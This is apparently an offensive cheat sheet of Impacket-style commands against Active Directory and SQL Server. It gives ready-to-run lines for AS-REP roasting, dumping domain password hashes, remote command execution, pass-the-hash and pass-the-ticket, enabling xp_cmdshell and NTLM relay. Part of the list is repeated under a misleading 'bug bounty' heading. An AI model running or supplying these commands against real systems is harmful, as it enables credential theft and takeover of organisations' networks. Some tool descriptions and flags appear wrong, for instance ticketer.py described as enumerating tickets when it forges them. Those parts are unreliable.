# Enumerate users in the Active Directory domain
GetADUsers.py -all -dc-ip 10.0.0.1 your-domain.local/your-user:your-password
# Retrieve users without pre-authentication enabled (AS_REP Roasting)
GetNPUsers.py your-domain.local/ -usersfile users.txt -outputfile hashes.txt -dc-ip 10.0.0.1 -format john
# Dump password hashes from a Windows machine using SMB protocol
secretsdump.py -just-dc your-domain.local/your-user:your-password@10.0.0.2
# Dump password hashes from a Windows machine using LSASS
secretsdump.py -just-dc-ntlm your-domain.local/your-user:your-password@10.0.0.2
# Remote execution on a target machine using WMI
wmiexec.py your-domain.local/your-user:your-password@10.0.0.3
# Remote execution on a target machine using SMB
smbexec.py your-domain.local/your-user:your-password@10.0.0.4
# Remote execution on a target machine using Task Scheduler
atexec.py your-domain.local/your-user:your-password@10.0.0.5 cmd.exe
# Remote execution on a target machine using DCOM
dcomexec.py your-domain.local/your-user:your-password@10.0.0.6 cmd.exe
# Enumerate shares and permissions on a target machine using SMB
smbmap.py -u your-user -p your-password -d your-domain.local -H 10.0.0.7
# Enumerate and retrieve group policy preferences from a domain controller
gpprefdecrypt.py -s your-domain.local -u your-user -p your-password -d your-domain.local
# Enumerate and retrieve group policy preferences from an SMB share
gpprefdecrypt.py -s smb://10.0.0.8/sysvol -u your-user -p your-password -d your-domain.local
# Enumerate Kerberos tickets from a machine using Kerberos protocol
ticketer.py -nthash your-nt-hash -domain-sid your-domain-sid -domain your-domain.local your-user
# Perform pass-the-hash attack with SMB and execute a command
psexec.py -hashes lmhash:nthash your-domain.local/your-user@10.0.0.9 cmd.exe
# Perform pass-the-ticket attack with Kerberos and execute a command
wmiexec.py -k -no-pass your-domain.local/your-user@10.0.0.10 cmd.exe
#SMB and SQL Specific
# Host a read-only SMB server on port 445 with the provided folder as the share
smbserver.py -smb2support -username your-user -password your-password SHARE_NAME /path/to/folder
# Host an SMB server with write access on a specific IP and port
smbserver.py -smb2support -ip 10.0.0.1 -port 8445 -username your-user -password your-password -comment 'Writable Share' SHARE_NAME /path/to/folder
# Connect to an SQL Server instance and execute a query (Windows Authentication)
mssqlclient.py -windows-auth your-domain.local/your-user:your-password@10.0.0.2
# Connect to an SQL Server instance and execute a query (SQL Server Authentication)
mssqlclient.py -db your-database your-user:your-password@10.0.0.3
# Connect to an SQL Server instance and enable xp_cmdshell
mssqlclient.py your-domain.local/your-user:your-password@10.0.0.4 -enable-xp-cmdshell
# Execute a command on the SQL Server using xp_cmdshell (once it's enabled)
mssqlclient.py your-domain.local/your-user:your-password@10.0.0.5 -q 'EXEC xp_cmdshell "ipconfig"'
# Perform an NTLM relay attack from an SMB server to a target machine
ntlmrelayx.py -t smb://10.0.0.6 -smb2support -smbserver your-smb-server
# Perform an NTLM relay attack from an SMB server to an LDAP server
ntlmrelayx.py -t ldap://10.0.0.7 -smb2support -smbserver your-smb-server
# Enumerate MSSQL instances using SQL Server Browser service
mssqlinstance.py -ip 10.0.0.8
# Test an MSSQL connection with a provided username and password
mssqlclient.py -db your-database -windows-auth your-domain.local/your-user:your-password@10.0.0.9
#Top 10 Bug Bounty
# 1. Enumerate users in the Active Directory domain
GetADUsers.py -all -dc-ip 10.0.0.1 your-domain.local/your-user:your-password
# 2. Retrieve users without pre-authentication enabled (AS_REP Roasting)
GetNPUsers.py your-domain.local/ -usersfile users.txt -outputfile hashes.txt -dc-ip 10.0.0.1 -format john
# 3. Dump password hashes from a Windows machine using SMB protocol (look for weak or reused passwords)
secretsdump.py -just-dc your-domain.local/your-user:your-password@10.0.0.2
# 4. Enumerate shares and permissions on a target machine using SMB (identify misconfigured shares)
smbmap.py -u your-user -p your-password -d your-domain.local -H 10.0.0.3
# 5. Enumerate and retrieve group policy preferences from a domain controller (look for hardcoded credentials)
gpprefdecrypt.py -s your-domain.local -u your-user -p your-password -d your-domain.local
# 6. Enumerate Kerberos tickets from a machine using Kerberos protocol (identify misconfigurations or vulnerabilities)
ticketer.py -nthash your-nt-hash -domain-sid your-domain-sid -domain your-domain.local your-user
# 7. Perform pass-the-hash attack with SMB and execute a command (escalate privileges)
psexec.py -hashes lmhash:nthash your-domain.local/your-user@10.0.0.4 cmd.exe
# 8. Connect to an SQL Server instance and execute a query (identify SQL Server misconfigurations or vulnerabilities)
mssqlclient.py -db your-database your-user:your-password@10.0.0.5
# 9. Perform an NTLM relay attack from an SMB server to a target machine (exploit misconfigured SMB signing)
ntlmrelayx.py -t smb://10.0.0.6 -smb2support -smbserver your-smb-server
# 10. Test an MSSQL connection with a provided username and password (identify weak or reused credentials)
mssqlclient.py -db your-database -windows-auth your-domain.local/your-user:your-password@10.0.0.7